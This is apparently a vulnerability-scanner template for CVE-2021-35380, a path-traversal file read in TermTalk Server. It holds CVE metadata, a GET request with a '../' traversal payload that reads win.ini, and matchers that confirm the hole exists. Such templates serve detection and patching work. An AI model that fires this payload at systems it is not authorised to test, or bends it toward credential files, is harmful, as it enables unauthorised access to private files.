id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    cpe: cpe:2.3:a:solari:termtalk_server:*:*:*:*:*:*:*:*
    epss-score: 0.05301
  tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2023/01/15